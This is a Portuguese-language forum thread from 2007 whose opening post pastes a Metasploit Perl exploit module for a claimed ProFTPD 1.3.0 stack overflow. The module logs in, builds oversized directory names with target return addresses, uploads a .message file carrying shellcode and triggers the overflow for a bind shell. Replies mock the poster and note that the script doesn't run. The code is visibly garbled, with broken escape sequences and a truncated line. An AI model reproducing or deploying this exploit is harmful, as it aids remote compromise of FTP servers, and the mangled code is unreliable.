Autor Tópico: Linux: ProFTPD 1.3.0 (Exploit)  (Lida 2478 vezes)

Offline calejo

  • Newbie
  • *
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
Linux: ProFTPD 1.3.0 (Exploit)
« em: Abril 23, 2007, 03:58:41 pm »
Código: [Seleccione]
##########################################

#Lusovista.com sucks, by calejo and Rewtor

##########################################

use strict;



package Msf::Exploit::vd_proftpd;

use base "Msf::Exploit";

use Pex::Text;



my $advanced = { };



my $info =

{

"Name"  => "[0day] ProFTPD 1.3.0 stack overflow",

"Version"   => "$Revision: 1.1 $",

"Authors"   => ["Evgeny Legerov"],

"Arch"  => ["x86"],

"OS" => ["linux"],

"Priv"  => 1,

"UserOpts"  =>

{

"RHOST" => [1, "ADDR", "The target address"],

"RPORT" => [1, "PORT", "The target port", 21],

"USER"  => [1, "DATA", "Username", "ftp"],

"PASS"  => [1, "DATA", "Password", "ftp123"],

"DIR"   => [0, "DATA", "Writeable directory", ""],

},



"Description" => Pex::Text::Freeform(q{

Linux não tem virus pq ninguem o usa.

}),





    "Payload" =>

{

"Space" => 900,

"Keys"  => ["+bind"],

"BadChars" => "%rnx00"

 },



"DefaultTarget"  => 0,

"Targets" =>

[

["ProFTPD 1.3.0 (source install) / Debian 3.1",

# objdump -D proftpd|grep call|grep edx

0x804afc8,

# nm proftpd|grep permanent_pool

0x80b59f8

]



],



"Keys"   => ["vd_proftpd"],

};



sub new {

my $class = shift;

return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_);

}



sub Exploit {

my $self = shift;

my $host = $self->GetVar("RHOST");

my $port = $self->GetVar("RPORT");

my $writedir = $self->GetVar("DIR");

my $bind_port = $self->GetVar("LPORT");

my $target = $self->Targets->[$self->GetVar("TARGET")];

my $encodedPayload = $self->GetVar("EncodedPayload");

my $shellcode   = $encodedPayload->Payload;



 my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort"  => $port);

if ($sock->IsError) {

$self->PrintLine("Error creating socket: " . $sock->GetError);

return;

}



my $res = $sock->Recv(-1, 20);

if (!$res) {

$self->PrintLine("The service did not return a valid banner");

return;

}



$self->PrintLine("Banner: ". $self->CleanData($res));



$sock->Send("USER ". $self->GetVar(\\'USER\\') ."rn");

$res = $sock->Recv(-1, 20);

$self->PrintLine("USER response: ". $self->CleanData($res));

if ($res !~ /^331/) {

$sock->Close;

return;

}



$sock->Send("PASS ". $self->GetVar(\\'PASS\\') ."rn");

$res = $sock->Recv(-1, 20);

$self->PrintLine("PASS response: ". $self->CleanData($res));

if ($res !~ /^230/) {

$sock->Close;

return;

}

if (length($writedir) > 0) {

$sock->Send("CWD $writedirrn");

$res = $sock->Recv(-1, 20);

$self->PrintLine("CWD response: " . $self->CleanData($res));

}



my $current_dir = "";

$sock->Send("PWDrn");

$res = $sock->Recv(-1, 20);

$current_dir = $1 if ($res =~ /257s"(.+)"/);

$current_dir .= "/" if (substr($current_dir, -1, 1) ne "/");

  $self->PrintLine("Current directory: $current_dir");



my $dir1 = "A" x (251 - length($current_dir));

$self->PrintLine(sprintf "Dir1 length is %d bytes", length($dir1));



$sock->Send("MKD $dir1rn");

$res = $sock->Recv(-1, 20);

$self->PrintLine("MKD response: " . $self->CleanData($res));



$sock->Send("CWD $dir1rn");

$res = $sock->Recv(-1,20);

$self->PrintLine("CWD response: " . $self->CleanData($res));



 $sock->Send("PWDrn");

$res = $sock->Recv(-1, 20);

$self->PrintLine("PWD response: " . $self->CleanData($res));



my $dir2  = "B" x 64;

$dir2 .= pack("V", $target->[1]);

$dir2 .= pack("V", $target->[2] - 4);

$dir2 .= "xcc" x 28;

$self->PrintLine(sprintf "Dir2 length is %d bytes", length($dir2));



$sock->Send("DELE " . $dir2 . "/.messagern");

$sock->Recv(-1, 20);



$sock->Send("DELE " . $dir2 . "/250rn");

$sock->Recv(-1, 20);



$sock->Send("RMD $dir2rn");

$sock->Recv(-1, 20);



$sock->Send("MKD $dir2rn");

$res = $sock->Recv(-1, 20);

$self->PrintLine("MKD response: " . $self->CleanData($res));



# Upload .message file

$sock->Send("TYPE Irn");

$sock->Recv(-1, 20);



$sock->Send("PASVrn");

$res = $sock->Recv(-1, 20);

if ($res !~ /^227/) {

$self->PrintLine("Incorrect response to PASV command: " . $self->CleanData($res));

return;

}



$self->PrintLine("PASV response: " . $self->CleanData($res));

$res =~ /((d+),(d+),(d+),(d+),(d+),(d+)/;

my $datahost = "$1.$2.$3.$4";

my $dataport = (int($5) <<8>PrintLine("Opening connection to $datahost:$dataport");

  my $datasock = Msf::Socket::Tcp->new("PeerAddr" => $datahost, "PeerPort"  => $dataport);

if ($datasock->IsError) {

$self->PrintLine("Error creating socket: " . $datasock->GetError);

return;

}



$sock->Send("STOR $dir2/.messagern");

$res = $sock->Recv(-1, 20);

$self->PrintLine("STOR response: " . $self->CleanData($res));





my $filedata = "";

$filedata .= "A";

$filedata .= "x66x81xc2x5ex13x52xc3"; # add $0x135e, %dx; push %edx; ret

$filedata .= "%C" x 11;

$filedata .= "A";

$filedata .= $shellcode;

$filedata .= "A" x (900 - length($shellcode));

$filedata .= "%CA" x 10;



$datasock->Send($filedata);

$datasock->Close();



$res = $sock->Recv(-1, 20);

$self->PrintLine("FILE transfered: " . $self->CleanData($res));



# Trigger sreplace overflow

$sock->Send("CWD $dir2rn");

$sock->Recv(-1,20);



sleep(3);



$sock->Close();

}





sub CleanData {

my $self = shift;

my $data = shift;

$data =~ s/r|n//g;

return $data;

}



__END__

Offline GettinBetter

  • Newbie
  • *
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #1 em: Abril 23, 2007, 04:18:53 pm »
Que queres provar com isso? Que o linux é inseguro? Esse exploit só afeta quem tem o ProFTPD e essa versão já está desactualizada (saiu á um ano) agora estão na 1.3.1 e muito possivelmente esse exploit já foi corrigido

http://www.istartedsomething.com/20070206/...vista-exploits/

Offline calejo

  • Newbie
  • *
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #2 em: Abril 23, 2007, 04:30:04 pm »
Mas esqueces-te que o windows tem muito mais people que o linux ou mac juntos, mais people = mais hackers.. Essse exploit e da versão passado, mas afecta as novas versões também, senão não punha este exploit jovem.. Ah tem calma que isto ainda mal começou.

Offline lycosman

  • Global Moderator
  • Newbie
  • *****
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #3 em: Abril 23, 2007, 05:51:42 pm »
Não te tás a esticar um bocadinho? :?
Hooray for chainsaws :3


Offline masterhard

  • Newbie
  • *
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
    • http://www.appletuga.com
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #4 em: Abril 23, 2007, 06:18:48 pm »
oh meu filho, quero coisas que funcionem....
 :wink:
Se o mundo te virar costas, nao vires costas ao mundo, vai-lhe ao cu!
Se a Muralha da China pegasse fogo, seria a maior firewall do Mundo!
blacksheep-----fake hosting services since 1$ only for fake businessman----sponsored by ASAE
Oferecemos Cursos de Coveiro WebTuga --> O primeiro em Portugal com MBA da Independente incorporado
"Well, I guess it would be nice if I could touch your body" --George Michael\'s \'Faith\'
Sing these words in a recording studio, and you win Album of the Year. Say them in a public bathroom, and you get busted.
The basic difference is this: hackers build things, crackers break them.
O novo Windows será o Se7en. Será uma sequela do famoso filme de terror Se7en?
MADNESS?? THIS Is SPARTTTAAAAAAAAAAAAAAAAAAAAA!!!!!!!!!!
Sponsored by InTeRnEt SeRiOuS BuSiNeSs and MiCrOsOfT SeRiOuS BuSiNeSs!
MCSE -> Minesweeper Consultant and Solitaire Expert
VISTA -> Virus Infection and Spyware Transmission Architecture

Offline masterhard

  • Newbie
  • *
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
    • http://www.appletuga.com
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #5 em: Abril 23, 2007, 06:41:20 pm »
Citar
Mas esqueces-te que o windows tem muito mais people que o linux ou mac juntos, mais people = mais hackers.. Essse exploit e da versão passado, mas afecta as novas versões também, senão não punha este exploit jovem.. Ah tem calma que isto ainda mal começou.

o windows tem 60% do mercado mundial,so what? pessoas que so mexem em word excel pouco mais...:|
a puta da festa vai acabar e jah! pra mariquices ja temos o primeiro ministro a fazer figura de urso!

faz um buraco e mete-te la dentro,antes que te evergonhe aqui no forum...
Se o mundo te virar costas, nao vires costas ao mundo, vai-lhe ao cu!
Se a Muralha da China pegasse fogo, seria a maior firewall do Mundo!
blacksheep-----fake hosting services since 1$ only for fake businessman----sponsored by ASAE
Oferecemos Cursos de Coveiro WebTuga --> O primeiro em Portugal com MBA da Independente incorporado
"Well, I guess it would be nice if I could touch your body" --George Michael\'s \'Faith\'
Sing these words in a recording studio, and you win Album of the Year. Say them in a public bathroom, and you get busted.
The basic difference is this: hackers build things, crackers break them.
O novo Windows será o Se7en. Será uma sequela do famoso filme de terror Se7en?
MADNESS?? THIS Is SPARTTTAAAAAAAAAAAAAAAAAAAAA!!!!!!!!!!
Sponsored by InTeRnEt SeRiOuS BuSiNeSs and MiCrOsOfT SeRiOuS BuSiNeSs!
MCSE -> Minesweeper Consultant and Solitaire Expert
VISTA -> Virus Infection and Spyware Transmission Architecture

Offline trmanco

  • Global Moderator
  • Newbie
  • *****
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
    • http://trmanco.com
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #6 em: Abril 23, 2007, 06:49:10 pm »
Citar
Citar
Mas esqueces-te que o windows tem muito mais people que o linux ou mac juntos, mais people = mais hackers.. Essse exploit e da versão passado, mas afecta as novas versões também, senão não punha este exploit jovem.. Ah tem calma que isto ainda mal começou.

o windows tem 60% do mercado mundial,so what? pessoas que so mexem em word excel pouco mais...:|
a puta da festa vai acabar e jah! pra mariquices ja temos o primeiro ministro a fazer figura de urso!

faz um buraco e mete-te la dentro,antes que te evergonhe aqui no forum...

Envergonha - o que eu quero ver....tou a falar a sério...

Offline nunojsilva

  • Newbie
  • *
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
    • http://njsg.no.sapo.pt
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #7 em: Abril 23, 2007, 07:28:08 pm »
Já agora como eh suposto uma pessoa executar isso? Meter o codigo num ficheiro, invocar a bash e esperar que dê por milagre?

Só para que conste, os ficheiros de script devem ter na primeira linha o nome do interpretador a usar na execução.

E.g.
#!/bin/env bash
para a bourne-again shell

#!/bin/env python

e por aí fora.

Começa por criar scripts que *funcionem* depois a gente conversa.
Nuno J. Silva (AKA njsg)
XMPP: nunojsilva@jabber80.com

Offline trmanco

  • Global Moderator
  • Newbie
  • *****
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
    • http://trmanco.com
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #8 em: Abril 23, 2007, 07:37:53 pm »
Bem o senhor Calejo....Para quem sabia 10 Linguagens de Programação.... X(

Offline masterhard

  • Newbie
  • *
  • Mensagens: 0
  • Karma: +0/-0
    • Ver Perfil
    • http://www.appletuga.com
Linux: ProFTPD 1.3.0 (Exploit)
« Responder #9 em: Abril 23, 2007, 07:49:34 pm »
pera que isto e so o principio...  :loli:

ah, e se nao quiser executar porque nao gosto do que ta escrito dentro dele?
rm -r exploit.sh?
Se o mundo te virar costas, nao vires costas ao mundo, vai-lhe ao cu!
Se a Muralha da China pegasse fogo, seria a maior firewall do Mundo!
blacksheep-----fake hosting services since 1$ only for fake businessman----sponsored by ASAE
Oferecemos Cursos de Coveiro WebTuga --> O primeiro em Portugal com MBA da Independente incorporado
"Well, I guess it would be nice if I could touch your body" --George Michael\'s \'Faith\'
Sing these words in a recording studio, and you win Album of the Year. Say them in a public bathroom, and you get busted.
The basic difference is this: hackers build things, crackers break them.
O novo Windows será o Se7en. Será uma sequela do famoso filme de terror Se7en?
MADNESS?? THIS Is SPARTTTAAAAAAAAAAAAAAAAAAAAA!!!!!!!!!!
Sponsored by InTeRnEt SeRiOuS BuSiNeSs and MiCrOsOfT SeRiOuS BuSiNeSs!
MCSE -> Minesweeper Consultant and Solitaire Expert
VISTA -> Virus Infection and Spyware Transmission Architecture

 

Sitemap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49